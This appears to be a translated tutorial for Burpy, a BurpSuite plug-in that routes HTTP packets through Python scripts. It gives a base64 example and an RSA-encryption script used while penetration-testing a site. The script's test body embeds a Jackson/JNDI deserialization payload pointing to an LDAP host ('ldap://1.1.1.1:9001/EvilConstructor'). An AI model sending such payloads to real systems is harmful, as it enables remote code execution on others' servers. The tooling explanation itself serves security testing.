Burpy is a plug-in that can open up the relationship between BurpSuite and Python. From now on, you can use your python to process Http packets arbitrarily!
effect
Execute the specified python script and return the processing result to BurpSuite.
Function, UI introduction
Here's a note: use python2.
Specify your own python script in Burpy PY file path:, click start server, and you can work happily. Everyone pay attention here:
This place is some switches, to make the right-click menu more concise. After clicking, the right-click menu will change.
Turn on these switches and take a look at the right-click menu:
Burpy Main will automatically call the main method in our script
Burpy Enc will automatically call the encrypt method
And so on.
The functions of the two switches, Enable Processor and Enable Auto Enc/Dec, are quite special. Let’s talk about them separately here.
After enabling the enable processor, when using Intruder to perform brute force cracking and other actions, if the payload needs to be encrypted or signed, we can implement the encryption/signature algorithm into the processor function with our own python script.
How to write a script
In our own script, we need to create a new Burpy class, which will be initialized when the server is started.
The Burpy class has several functions: main, encrypt, decrypt, sign, processor. The functions are mentioned above and will not be repeated.
Among them, the main function is necessary, because the right-click menu always has a Burpy Main, which is the main function called. (If you don't even call Burpy Main, this function is also optional)
Other functions are optional. The reason for this design is that you don't have to perform encryption and decryption operations every time, sometimes you only need to perform md5 or base64. Is it not caring?
Talk is cheap, show me the code!
Let's look at some examples below!
coding
This is an example of base64 encoding. In fact, there are many plug-ins with base64 functions, and burpsuite itself has it. This is just to illustrate the usage of Burpy.
import base64
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def main(self, header, body):
return header, body
def encrypt(self, header, body):
body = base64.b64encode(body)
return header, body
def decrypt(self, header, body):
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"
Simple, right?
The flexibility of Burpy is here. It sends the entire HTTP packet to the script for processing. The HTTP header is stored in the header list. The body is a string. Get it done.
In the above function, we only use encrypt, in fact, other functions can be deleted
encryption
The above example is too simple, isn't it? This function is very tasteless. You can use the ctrl+b shortcut in burpsuite to complete it. You have to write a script. This is not an umbrella on a sunny day - is it unnecessary?
Let me explain here first: the following code is doing RSA encryption. In this project, the username and password are sent to the server after RSA encryption, the server will decrypt it, and get the source code through other vulnerabilities. After analysis, it is found that there may be a Jackson deserialization vulnerability, so I wrote this script to test.
In this RSA encryption, the current time will be taken, and then a 6-bit random character will be spliced into a nonce, and the public key can be found in the browser's JS. Without this plug-in, it is basically difficult to do this. After finding the js code, you have to execute the js code in the browser, copy and paste it, etc. Fortunately, we have Burpy, let's see how the script and experience are!
import json
class Burpy:
def main(self, header, body):
body_json = json.loads(body)
username = repr(body_json.get("username"))
body_json["username"] = "_XXXX_ENC_:V1:RSA:XXXX0001:" + self.rsa_enc(username)
body = json.dumps(body_json)
return header, body
def rsa_enc(self,data):
from Crypto.PublicKey import RSA
from base64 import b64decode,b64encode
from Crypto.Cipher import PKCS1_v1_5
import time
import random
t = int(round(time.time() * 1000))
s = ""
for i in range(6):
s += str(random.randint(1,10))
e = str(t) + s
i = dict()
i["text"] = data
i["timestamp"] = t+5
i["nonce"] = e
pubStr = "MIIxxxxxx9hnjsRkHvPUVT91pl9fR9VKn/F/JbwrNlDZQOnd0AXxxxxxxxcP61EVOdEqAdtA1law/6Z9O4c1nHaDBblx3R9Sr7Lxxxxxx0kxoox7LlAInToUqU1ofWNf0FlF+A6kd1wZhil1Iha9NS8z7UfMx92jxh9RtGWFKxxxxxl4UJsQoS7krDN6skb8SLwga4QYUU3ua8GCxxxxxxx"
msg = json.dumps(i)
#msg = "1565246122420" + msg
keyDER = b64decode(pubStr)
keyPub = RSA.importKey(keyDER)
cipher = PKCS1_v1_5.new(keyPub)
ct = cipher.encrypt(msg.encode('utf-8'))
ect = b64encode(ct)
return ect
def sign(self,data):
from Crypto.PublicKey import RSA
from base64 import b64decode,b64encode
from Crypto.Cipher import PKCS1_v1_5
import time
import random
t = int(round(time.time() * 1000))
s = ""
for i in range(6):
s += str(random.randint(1,10))
e = str(t) + s
i = dict()
i["text"] = data
i["timestamp"] = t+5
i["nonce"] = e
pubStr = "xxxxxx722fdwcupvDquRSlfU7TRI6mRPXo9ALHEUYIA2Bnpt0lU8VcP61EVOdEqAdtA1law/6Z9O4c1nHaDBblx3R9Sr7Lw3KJj6P2pRM/eNxxxxx0kxoox7LlAInToUqU1ofWNf0FlF+A6kd1wZhilxxxxxxB"
msg = json.dumps(i)
#msg = "1565246122420" + msg
keyDER = b64decode(pubStr)
keyPub = RSA.importKey(keyDER)
cipher = PKCS1_v1_5.new(keyPub)
ct = cipher.encrypt(msg.encode('utf-8'))
ect = b64encode(ct)
return ect
if __name__ == "__main__":
b = Burpy()
header = []
body = '{"username": {"text": ["org.hibernate.jmx.StatisticsService",{"sessionFactoryJNDIName": "ldap://1.1.1.1:9001/EvilConstructor"}]}, "svcCode": "client:009", "password": "2", "orgCode": "xxxx"}'
header1,body1 = b.main(header, body)
print body1
Come experience it:
Ruijiang Cloud official website link: www.eflycloud.com